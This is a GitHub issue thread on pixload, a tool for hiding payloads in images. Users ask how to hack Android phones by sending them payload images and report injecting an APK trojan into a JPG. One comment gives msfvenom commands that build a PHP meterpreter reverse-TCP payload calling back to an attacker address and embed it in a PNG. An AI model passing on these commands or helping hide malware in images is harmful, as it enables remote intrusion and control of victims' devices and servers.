sighook / pixload

Image Payload Creating/Injecting tools
Do What The F*ck You Want To Public License
1.19k stars 237 forks source link

Support ANDROID :) #14

Open Legendhackers opened 3 years ago

Legendhackers commented 3 years ago

This project support for Android .

davidalv27 commented 3 years ago

Cómo se puede utilizar en Android?

CedenoJonathan commented 3 years ago

lo puedes usar en distros linux como kalilinux, parrot aunque no creo que sea compatible en termux aunque deberia funcionar

davidalv27 commented 3 years ago

Yo utilizo userland

kutukepik commented 2 years ago

How to bypass the protection in Android 11 or newer?

sighook commented 1 year ago

pixload depends on a few perl modules described there. This means that pixload runs in any Linux environment like Termux, Nethunter, any-other-chroot-gzipped-tarball, etc, wtf. Personally, I have successfully run pixload on Nethunter.

Hack fun, Alex.

dingpo0010 commented 1 year ago

CAN WE HACK ANDROID DEVICE BY SEND THEM PAYLOAD IN FORMAT OF GIFF JPEG ,PNG OR GIFF IMAGE USING PIXLOAD IS THIS POSSIBLE?

msfvenom If you want to inject a metasploit payload, you have to do something like this:

Create metasploit payload (i.e. php). $ msfvenom -p php/meterpreter_reverse_tcp \ LHOST=192.168.0.1 LPORT=31337 -f raw 2>/dev/null > payload.php Edit payload.php if needed.

Inject payload.php into the image (i.e. png).

$ pixload-png --payload "$(cat payload.php)" payload.png

AnujMuth commented 1 year ago

I tried to inject the apk Trojan horse into the jpg picture, and the injection was successful, but the apk could not be installed successfully after opening the picture with the mobile phone, and there was no response. Has anyone succeeded?

dingpo0010 commented 1 year ago

I tried to inject the apk Trojan horse into the jpg picture, and the injection was successful, but the apk could not be installed successfully after opening the picture with the mobile phone, and there was no response. Has anyone succeeded?

im asking that if possible to hack android with image using this github tool chinarulez pix